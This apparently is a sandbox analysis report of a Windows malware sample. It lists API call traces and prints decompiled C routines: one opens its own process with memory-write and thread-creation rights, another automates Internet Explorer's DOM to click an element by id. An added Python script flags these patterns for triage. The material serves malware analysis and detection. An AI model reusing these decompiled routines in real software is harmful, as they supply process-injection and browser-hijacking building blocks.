                                                              • Part of subcall function 04574B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04561211,?), ref: 04574B72
                                                              • Part of subcall function 04574B63: mbstowcs.NTDLL ref: 04574B8E
                                                            • lstrlenW.KERNEL32(00000000,73BCF560,00000000,?,00000000), ref: 0457942B
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457943D
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0457945A
                                                            • lstrlenW.KERNEL32(00000000), ref: 04579466
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0457947A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                                                            • String ID:
                                                            • API String ID: 3403466626-0
                                                            • Opcode ID: 16603e6e055a22aa737e01afa54eaed9d7eaa3418e101dc9e64edd953dcccbd7
                                                            • Instruction ID: b16c6c070d0ee944ec908c6daedeb5ee0a153e482ce05a3865461e1c99920910
                                                            • Opcode Fuzzy Hash: 16603e6e055a22aa737e01afa54eaed9d7eaa3418e101dc9e64edd953dcccbd7
                                                            • Instruction Fuzzy Hash: F2014C76100218EFD712AB99EC84F9E77ACFB49314F115029F505AB251CF78AD08AB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32 ref: 04576A97
                                                            • GetModuleHandleA.KERNEL32 ref: 04576AA5
                                                            • LoadLibraryExW.KERNEL32(?,?,?), ref: 04576AB2
                                                            • GetModuleHandleA.KERNEL32 ref: 04576AC9
                                                            • GetModuleHandleA.KERNEL32 ref: 04576AD5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule$LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1178273743-0
                                                            • Opcode ID: c64cd9319ce71d66bcbdda9e6c43ddbde464b518ffad0c258b5fd9730e558178
                                                            • Instruction ID: d83dea132e489cf9b4aada4d7cbdf3c0f02dc16752a947b0f4792feb5a087496
                                                            • Opcode Fuzzy Hash: c64cd9319ce71d66bcbdda9e6c43ddbde464b518ffad0c258b5fd9730e558178
                                                            • Instruction Fuzzy Hash: 9101623160031ADF9B019F6AFC419667B99FB042B0704403AFA15D6260DFA5EC35BB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(0458C300), ref: 0456CD69
                                                            • RtlLeaveCriticalSection.NTDLL(0458C300), ref: 0456CD7A
                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,0000000C,?,?,045802E6,0458B7A0,-0000000C,00000000,0457C508,0000000C,00000000,?,0000000C,00000000), ref: 0456CD91
                                                            • VirtualProtect.KERNEL32(?,00000004,0000000C,0000000C,?,?,045802E6,0458B7A0,-0000000C,00000000,0457C508,0000000C,00000000,?,0000000C,00000000), ref: 0456CDAB
                                                            • GetLastError.KERNEL32(?,?,045802E6,0458B7A0,-0000000C,00000000,0457C508,0000000C,00000000,?,0000000C,00000000,?), ref: 0456CDB8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                            • String ID:
                                                            • API String ID: 653387826-0
                                                            • Opcode ID: 868a8b48383da8927699c7dcd3aaa5bbde2fe40bf26c32ca1cd01d7e1aae3319
                                                            • Instruction ID: 29a61471680d3720c2073a87a26f653634793904a4373ae198d6fd554686e6ed
                                                            • Opcode Fuzzy Hash: 868a8b48383da8927699c7dcd3aaa5bbde2fe40bf26c32ca1cd01d7e1aae3319
                                                            • Instruction Fuzzy Hash: 76014FB6200604EFD7219F15DC04E6AB7B9FF84621B10451DEA56A3250DB71FD05AB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 045638A7
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 045638B7
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 045638C0
                                                            • VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,045767F1,?,?,00000040), ref: 045638DE
                                                            • VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,045767F1,?,?,00000040), ref: 045638EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                                            • String ID:
                                                            • API String ID: 3667519916-0
                                                            • Opcode ID: e21bd8bb68763bfe18cd1ec34a24bec96d3ba489a8baaf7fb75148b0f1eb0ff9
                                                            • Instruction ID: d462473a4022515af200e5cdc5da226772093606590e3b7eaaff6fd4a2f6f2d0
                                                            • Opcode Fuzzy Hash: e21bd8bb68763bfe18cd1ec34a24bec96d3ba489a8baaf7fb75148b0f1eb0ff9
                                                            • Instruction Fuzzy Hash: 55F05E70200700AFEB206B35EC48F57B2A9FF84715F104628F946A2590CF28FC49EA24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0456136B,?), ref: 04562738
                                                            • GetVersion.KERNEL32 ref: 04562747
                                                            • GetCurrentProcessId.KERNEL32 ref: 04562756
                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04562773
                                                            • GetLastError.KERNEL32 ref: 04562792
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                            • String ID:
                                                            • API String ID: 2270775618-0
                                                            • Opcode ID: 9db34ec00910a686ade6f01689c8040cbc1d13bc2b18bb60098eec5cf3de0cd4
                                                            • Instruction ID: df2ded1324feaac54ca1e34ad58427a5e97044fdc7cfa6521423b6c5847c6205
                                                            • Opcode Fuzzy Hash: 9db34ec00910a686ade6f01689c8040cbc1d13bc2b18bb60098eec5cf3de0cd4
                                                            • Instruction Fuzzy Hash: 94F0BD74A80341DEE7619F24A889B153BA4F704B81F10651DF657E66C0DF78A844FB29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			#include <windows.h>
                                                            			#include <stdint.h>
                                                            			typedef intptr_t intOrPtr;   /* decompiler's generic integer-or-pointer type */

                                                            			/* Decompiled initialisation routine; the 0x00DDA2xx addresses are globals in
                                                            			   the sample's data section. Casts and comments added for readability,
                                                            			   behaviour unchanged. */
                                                            			long E00DD6707(intOrPtr _a4) {
                                                            				void* _t2;
                                                            				long _t4;
                                                            				void* _t5;
                                                            				long _t6;
                                                            				void* _t7;

                                                            				/* manual-reset event, initially non-signalled; handle stored in a global */
                                                            				_t2 = CreateEventA(0, 1, 0, 0);
                                                            				 *(void**)0xdda2c4 = _t2;
                                                            				if(_t2 == 0) {
                                                            					return GetLastError();
                                                            				}
                                                            				/* OS version gate: returns 0x32 (50, ERROR_NOT_SUPPORTED) when the value is 5 or below */
                                                            				_t4 = GetVersion();
                                                            				if(_t4 <= 5) {
                                                            					_t5 = (void*)0x32;
                                                            					return (long)(intptr_t)_t5;
                                                            				}
                                                            				 *(long*)0xdda2b4 = _t4;
                                                            				_t6 = GetCurrentProcessId();
                                                            				 *(long*)0xdda2b0 = _t6;
                                                            				 *(intOrPtr*)0xdda2bc = _a4;
                                                            				/* opens its own process with SYNCHRONIZE | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE |
                                                            				   PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD (0x10047A) */
                                                            				_t7 = OpenProcess(0x10047a, 0, _t6);
                                                            				 *(void**)0xdda2ac = _t7;
                                                            				if(_t7 == 0) {
                                                            					/* fall back to -1, the current-process pseudo handle returned by GetCurrentProcess() */
                                                            					 *(void**)0xdda2ac = (void*)(intptr_t)-1;
                                                            				}
                                                            				return 0;
                                                            			}

                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00DD6671,?,?,00000001), ref: 00DD670F
                                                            • GetVersion.KERNEL32(?,00000001), ref: 00DD671E
                                                            • GetCurrentProcessId.KERNEL32(?,00000001), ref: 00DD672D
                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00DD674A
                                                            • GetLastError.KERNEL32(?,00000001), ref: 00DD6769
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                            • String ID:
                                                            • API String ID: 2270775618-0
                                                            • Opcode ID: a016eb702d8d111a301918918d7957239d6499bbdb9813ca932d97494ea46695
                                                            • Instruction ID: 3d07e4600f3e40b074ab7fb6b55f44bffe131711fe2b505d8444d75ed8214897
                                                            • Opcode Fuzzy Hash: a016eb702d8d111a301918918d7957239d6499bbdb9813ca932d97494ea46695
                                                            • Instruction Fuzzy Hash: B5F01770A46305AFD7A09FAAAE19B257FA5A704B44F14841BE646C63E4D7729400CF3A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457B35B
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457B36C
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457B384
                                                            • CloseHandle.KERNEL32(?), ref: 0457B39E
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457B3B3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeHeap$CloseHandle
                                                            • String ID:
                                                            • API String ID: 1910495013-0
                                                            • Opcode ID: 4277f68b474f2cfa718528a58c77ce48a302b58529645685e8f60b64c600cab6
                                                            • Instruction ID: fdbaa165aa6b35d3f03b8c4a5bc3d14779a5a0b2d3cdc09874b64a2ef30b995f
                                                            • Opcode Fuzzy Hash: 4277f68b474f2cfa718528a58c77ce48a302b58529645685e8f60b64c600cab6
                                                            • Instruction Fuzzy Hash: C0312670201522EFC721AF65E988C2EFBAAFF44B183544524F404E7651CB36FCA1EB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0457F460
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • wsprintfA.USER32 ref: 0457F491
                                                              • Part of subcall function 0456C12C: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0456C142
                                                              • Part of subcall function 0456C12C: wsprintfA.USER32 ref: 0456C16A
                                                              • Part of subcall function 0456C12C: lstrlen.KERNEL32(00000008), ref: 0456C179
                                                              • Part of subcall function 0456C12C: wsprintfA.USER32 ref: 0456C1B9
                                                              • Part of subcall function 0456C12C: wsprintfA.USER32 ref: 0456C1EE
                                                              • Part of subcall function 0456C12C: memcpy.NTDLL(00000000,?,?), ref: 0456C1FB
                                                              • Part of subcall function 0456C12C: memcpy.NTDLL(00000008,045863D8,00000002,00000000,?,?), ref: 0456C210
                                                              • Part of subcall function 0456C12C: wsprintfA.USER32 ref: 0456C233
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0457F506
                                                              • Part of subcall function 04583EDA: RtlEnterCriticalSection.NTDLL(049BB148), ref: 04583EF0
                                                              • Part of subcall function 04583EDA: RtlLeaveCriticalSection.NTDLL(049BB148), ref: 04583F0B
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000), ref: 0457F4F0
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457F4FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                                            • String ID:
                                                            • API String ID: 3553201432-0
                                                            • Opcode ID: 4221d428089ff6ab8cee2e86281dabef0290071b7a1d658c65385647c95882ed
                                                            • Instruction ID: 716f0713ebd1dd2160b963c7592b0105754c554f5796c36a53421ca0ee4e3653
                                                            • Opcode Fuzzy Hash: 4221d428089ff6ab8cee2e86281dabef0290071b7a1d658c65385647c95882ed
                                                            • Instruction Fuzzy Hash: 4921F97290014AFBCF11DFA5ED84C9F7BB9FB48304B00442AF915A6211DB75EA64EF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045691D3: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 045691EE
                                                              • Part of subcall function 045691D3: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 0456923C
                                                              • Part of subcall function 045691D3: GetProcAddress.KERNEL32(00000000,?), ref: 04569255
                                                              • Part of subcall function 045691D3: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 045692A6
                                                            • GetLastError.KERNEL32(?,?,?), ref: 04563E51
                                                            • FreeLibrary.KERNEL32(?,?,?), ref: 04563EB9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                                            • String ID:
                                                            • API String ID: 1730969706-0
                                                            • Opcode ID: deccdaf21810619296c04c9f5cc081b583cb375d26444ac7d7c53620d492ddd0
                                                            • Instruction ID: 8169a70b36b3d15e54833255055e03432881217acd64c59926485b32716bed4d
                                                            • Opcode Fuzzy Hash: deccdaf21810619296c04c9f5cc081b583cb375d26444ac7d7c53620d492ddd0
                                                            • Instruction Fuzzy Hash: 0C71F6B5E0020AEFCF10DFE5D9849AEBBB9FF48314B108469E916AB250D731AD45DF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
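
The APIs blocks above are what an analyst reads first in a listing like this: the OpenProcess(0010047A, ...) call at 00DD674A and, under subcall 045691D3, the RegOpenKeyA on 80000002 (HKEY_LOCAL_MACHINE) Software\Microsoft\WAB\DLLPath followed by LoadLibraryA and GetProcAddress. The Python below is an added example, not Joe Sandbox code and not code from the analysed sample: it parses those bullet lines into records, expands an OpenProcess access mask into PROCESS_* names (values from winnt.h), and applies three triage rules of its own. The sample lines are copied from the listings on this page; the rule wording and the conditions in `triage` are the example's assumptions, not sandbox signatures.

```python
"""Parse the 'APIs' bullet lines of a Joe Sandbox function listing and flag the
call patterns an analyst triages first.  Added example: not Joe Sandbox code and
not code from the analysed sample."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Bullet lines come in three shapes:
#   • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00DD674A
#   • wsprintfA.USER32 ref: 0457F491                                  (no argument list)
#     • Part of subcall function 045691D3: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 0456923C
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)

# PROCESS_* access rights from winnt.h (only the bits relevant to triage).
PROCESS_RIGHTS = {
    0x00000001: "PROCESS_TERMINATE",
    0x00000002: "PROCESS_CREATE_THREAD",
    0x00000008: "PROCESS_VM_OPERATION",
    0x00000010: "PROCESS_VM_READ",
    0x00000020: "PROCESS_VM_WRITE",
    0x00000040: "PROCESS_DUP_HANDLE",
    0x00000080: "PROCESS_CREATE_PROCESS",
    0x00000400: "PROCESS_QUERY_INFORMATION",
    0x00001000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00100000: "SYNCHRONIZE",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: Optional[str]          # address of the call site, as printed after "ref:"
    subcall_of: Optional[str]   # callee address when the line is "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return one ApiCall per recognised bullet line; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def decode_process_access(mask: int) -> List[str]:
    """Expand an OpenProcess dwDesiredAccess value into PROCESS_* names, lowest bit first."""
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    unknown = mask & ~sum(PROCESS_RIGHTS)
    if unknown:
        names.append("0x%08X" % unknown)   # bits outside the table stay visible instead of being dropped
    return names


def triage(calls: List[ApiCall]) -> List[str]:
    """Three rules of this example's own; they are not Joe Sandbox signatures."""
    findings = []
    for c in calls:
        if c.api == "OpenProcess" and c.args:
            try:
                mask = int(c.args[0], 16)
            except ValueError:        # '?' means the sandbox could not recover the argument
                continue
            rights = decode_process_access(mask)
            if {"PROCESS_VM_WRITE", "PROCESS_CREATE_THREAD"} <= set(rights):
                findings.append("OpenProcess at %s with write+thread rights: %s" % (c.ref, " | ".join(rights)))
        if c.api == "GetShellWindow":
            findings.append("GetShellWindow at %s: resolves the shell (explorer) window, a common first step "
                            "before targeting explorer.exe" % c.ref)
    # 80000002 is HKEY_LOCAL_MACHINE; WAB\DLLPath names the Windows Address Book DLL.
    wab = [c for c in calls if c.api.startswith("RegOpenKey") and any("\\WAB\\DLLPath" in a for a in c.args)]
    apis = {c.api for c in calls}
    if wab and {"LoadLibraryA", "GetProcAddress"} <= apis:
        findings.append("HKLM\\Software\\Microsoft\\WAB\\DLLPath read, then LoadLibraryA/GetProcAddress: "
                        "loads the Windows Address Book DLL by its registered path")
    return findings


# Constructed sample: bullet lines copied from the listings on this page.
SAMPLE = """
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00DD6671,?,?,00000001), ref: 00DD670F
• OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00DD674A
• wsprintfA.USER32 ref: 0457F491
  • Part of subcall function 045691D3: RegOpenKeyA.ADVAPI32(80000002,Software\\Microsoft\\WAB\\DLLPath,?), ref: 045691EE
  • Part of subcall function 045691D3: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 0456923C
  • Part of subcall function 045691D3: GetProcAddress.KERNEL32(00000000,?), ref: 04569255
• GetShellWindow.USER32 ref: 0457E876
"""

if __name__ == "__main__":
    for finding in triage(parse_api_lines(SAMPLE)):
        print(finding)
```

Lines the regex does not recognise are skipped silently, so extend the pattern rather than pre-filter if the bullet format changes; a `?` argument means the sandbox could not recover that value and is kept as text rather than parsed.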

                                                            APIs
                                                              • Part of subcall function 0457BAE4: lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,04574A41,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000), ref: 0457BAED
                                                              • Part of subcall function 0457BAE4: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0457BB10
                                                              • Part of subcall function 0457BAE4: memset.NTDLL ref: 0457BB1F
                                                              • Part of subcall function 04580B38: StrChrA.SHLWAPI(00000000,04575ADA,7656D3B0,049BB17C,00000000,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B5D
                                                              • Part of subcall function 04580B38: StrTrimA.SHLWAPI(00000000,0458847C,00000000,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B7C
                                                              • Part of subcall function 04580B38: StrChrA.SHLWAPI(00000000,04575ADA,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B88
                                                            • GetCurrentThreadId.KERNEL32 ref: 0457E7D5
                                                            • GetCurrentThread.KERNEL32 ref: 0457E7E8
                                                            • GetModuleHandleA.KERNEL32(00000000,045863D4,00000000,00000000,?,00000000,?,00000000,00000000,?), ref: 0457E86F
                                                            • GetShellWindow.USER32 ref: 0457E876
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CurrentThread$HandleModuleShellTrimWindowlstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1517849391-0
                                                            • Opcode ID: bdecd850fdcbf96ec65e6e0433f1229daae49fc4883a0d98393f849e8763f47c
                                                            • Instruction ID: e091f04f9104f739df700a1ccdaa7171ad40c06868f917f7811a266fb3866d7f
                                                            • Opcode Fuzzy Hash: bdecd850fdcbf96ec65e6e0433f1229daae49fc4883a0d98393f849e8763f47c
                                                            • Instruction Fuzzy Hash: BF518F72604301EFE710EF64E886A5AB7E8FF88714F00497DF545AB250DA74F948EB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E00DD2CA0(intOrPtr* __eax) {
                                                            				void* _v8;
                                                            				WCHAR* _v12;
                                                            				void* _v16;
                                                            				char _v20;
                                                            				void* _v24;
                                                            				intOrPtr _v28;
                                                            				void* _v32;
                                                            				intOrPtr _v40;
                                                            				short _v48;
                                                            				intOrPtr _v56;
                                                            				short _v64;
                                                            				intOrPtr* _t54;
                                                            				intOrPtr* _t56;
                                                            				intOrPtr _t57;
                                                            				intOrPtr* _t58;
                                                            				intOrPtr* _t60;
                                                            				void* _t61;
                                                            				intOrPtr* _t63;
                                                            				intOrPtr* _t65;
                                                            				intOrPtr* _t67;
                                                            				intOrPtr* _t69;
                                                            				intOrPtr* _t71;
                                                            				intOrPtr* _t74;
                                                            				intOrPtr* _t76;
                                                            				intOrPtr _t78;
                                                            				intOrPtr* _t82;
                                                            				intOrPtr* _t86;
                                                            				intOrPtr _t102;
                                                            				intOrPtr _t108;
                                                            				void* _t117;
                                                            				void* _t121;
                                                            				void* _t122;
                                                            				intOrPtr _t129;
                                                            
                                                            				_t122 = _t121 - 0x3c;
                                                            				_push( &_v8);
                                                            				_push(__eax);
                                                             				// slot at vtable offset 0x48 of the interface in __eax, called as (__eax, &_v8); on an IWebBrowser-derived
                                                             				// interface 0x48 is get_Document(IDispatch**). Every _t117 below is an HRESULT, tested with >= 0 (SUCCEEDED)
                                                             				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                             				if(_t117 >= 0) {
                                                            					_t54 = _v8;
                                                             					_t102 =  *0xdda2d4; // 0x2bed5a8
                                                             					_t5 = _t102 + 0xddb038; // 0x3050f485
                                                             					// vtable offset 0 is IUnknown::QueryInterface; _t5 addresses the requested IID, whose first dword
                                                             					// 0x3050f485 matches IID_IHTMLDocument3 (3050F485-98B5-11CF-BB82-00AA00BDCE0B); the slot offsets used
                                                             					// on _v32 below are consistent with that interface
                                                             					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                             					_t56 = _v8;
                                                             					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56); // vtable offset 8 is IUnknown::Release on the IDispatch just queried
                                                            					if(_t117 >= 0) {
                                                             						__imp__#2(0xdd92b0); // OLEAUT32 ordinal 2 = SysAllocString (APIs list, ref 00DD2CF0): BSTR from the wide string at 0xdd92b0
                                                             						_v28 = _t57;         // _t57 is eax after that call, i.e. the new BSTR, not the Release() result (decompiler dataflow)
                                                             						if(_t57 == 0) {
                                                             							_t117 = 0x8007000e; // E_OUTOFMEMORY
                                                            						} else {
                                                            							_t60 = _v32;
                                                             							// slot 0xbc on the IHTMLDocument3 pointer: getElementsByTagName(BSTR tag, IHTMLElementCollection**), collection in _v24
                                                             							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                             							_t86 = __imp__#6; // OLEAUT32 ordinal 6 = SysFreeString (APIs list, refs 00DD2DEB and 00DD2E1A)
                                                            							_t117 = _t61;
                                                            							if(_t117 >= 0) {
                                                            								_t63 = _v24;
                                                             								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20); // slot 0x24 = IHTMLElementCollection::get_length, element count in _v20
                                                            								if(_t117 >= 0) {
                                                            									_t129 = _v20;
                                                            									if(_t129 != 0) {
                                                             										// two 16-byte VARIANTs at _v64 and _v48: vt = 3 (VT_I4), lVal = _v56 (0) and _v40 (the loop counter)
                                                             										_v64 = 3;
                                                             										_v48 = 3;
                                                             										_v56 = 0;
                                                             										_v40 = 0;
                                                             										if(_t129 > 0) {
                                                             											while(1) {
                                                             												_t67 = _v24;
                                                             												// eight movsd copy the two VARIANTs (32 bytes) onto the stack as by-value arguments
                                                             												asm("movsd");
                                                             												asm("movsd");
                                                             												asm("movsd");
                                                             												asm("movsd");
                                                             												_t122 = _t122;
                                                             												asm("movsd");
                                                             												asm("movsd");
                                                             												asm("movsd");
                                                             												asm("movsd");
                                                             												// slot 0x2c = IHTMLElementCollection::item(VARIANT name, VARIANT index, IDispatch**), element in _v8
                                                             												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                            												if(_t117 < 0) {
                                                            													goto L16;
                                                            												}
                                                            												_t69 = _v8;
                                                            												_t108 =  *0xdda2d4; // 0x2bed5a8
                                                             												_t28 = _t108 + 0xddb0bc; // 0x3050f1ff
                                                             												// QueryInterface for the IID at _t28; its first dword 0x3050f1ff matches IID_IHTMLElement (3050F1FF-98B5-11CF-BB82-00AA00BDCE0B)
                                                             												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                             												if(_t117 >= 0) {
                                                             													_t74 = _v16;
                                                             													// slot 0x34 = IHTMLElement::get_id(BSTR*), the element's id attribute in _v12
                                                             													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                             													if(_t117 >= 0 && _v12 != 0) {
                                                             														_t78 =  *0xdda2d4; // 0x2bed5a8
                                                             														_t33 = _t78 + 0xddb078; // 0x76006f
                                                             														// compare the id against a module-relative wide string whose first characters are L"ov" (0x006f, 0x0076)
                                                             														if(lstrcmpW(_v12, _t33) == 0) {
                                                             															_t82 = _v16;
                                                             															 *((intOrPtr*)( *_t82 + 0x114))(_t82); // slot 0x114 = IHTMLElement::click() on the matching element
                                                             														}
                                                             														 *_t86(_v12); // SysFreeString(id)
                                                            													}
                                                            													_t76 = _v16;
                                                            													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                            												}
                                                            												_t71 = _v8;
                                                            												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                            												_v40 = _v40 + 1;
                                                            												if(_v40 < _v20) {
                                                            													continue;
                                                            												}
                                                            												goto L16;
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            								L16:
                                                            								_t65 = _v24;
                                                            								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                            							}
                                                            							 *_t86(_v28);
                                                            						}
                                                            						_t58 = _v32;
                                                            						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                            					}
                                                            				}
                                                            				return _t117;
                                                            			}

                                                            0x00dd2ca5
                                                            0x00dd2cae
                                                            0x00dd2caf
                                                            0x00dd2cb3
                                                            0x00dd2cb9
                                                            0x00dd2cbf
                                                            0x00dd2cc8
                                                            0x00dd2cce
                                                            0x00dd2cd8
                                                            0x00dd2cda
                                                            0x00dd2ce0
                                                            0x00dd2ce5
                                                            0x00dd2cf0
                                                            0x00dd2cf8
                                                            0x00dd2cfb
                                                            0x00dd2e1e
                                                            0x00dd2d01
                                                            0x00dd2d01
                                                            0x00dd2d0e
                                                            0x00dd2d14
                                                            0x00dd2d1a
                                                            0x00dd2d1e
                                                            0x00dd2d24
                                                            0x00dd2d31
                                                            0x00dd2d35
                                                            0x00dd2d3b
                                                            0x00dd2d3e
                                                            0x00dd2d44
                                                            0x00dd2d4a
                                                            0x00dd2d50
                                                            0x00dd2d53
                                                            0x00dd2d56
                                                            0x00dd2d5c
                                                            0x00dd2d65
                                                            0x00dd2d6b
                                                            0x00dd2d6c
                                                            0x00dd2d6f
                                                            0x00dd2d70
                                                            0x00dd2d71
                                                            0x00dd2d79
                                                            0x00dd2d7a
                                                            0x00dd2d7b
                                                            0x00dd2d7d
                                                            0x00dd2d81
                                                            0x00dd2d85
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd2d8b
                                                            0x00dd2d94
                                                            0x00dd2d9a
                                                            0x00dd2da4
                                                            0x00dd2da8
                                                            0x00dd2daa
                                                            0x00dd2db7
                                                            0x00dd2dbb
                                                            0x00dd2dc3
                                                            0x00dd2dc8
                                                            0x00dd2dda
                                                            0x00dd2ddc
                                                            0x00dd2de2
                                                            0x00dd2de2
                                                            0x00dd2deb
                                                            0x00dd2deb
                                                            0x00dd2ded
                                                            0x00dd2df3
                                                            0x00dd2df3
                                                            0x00dd2df6
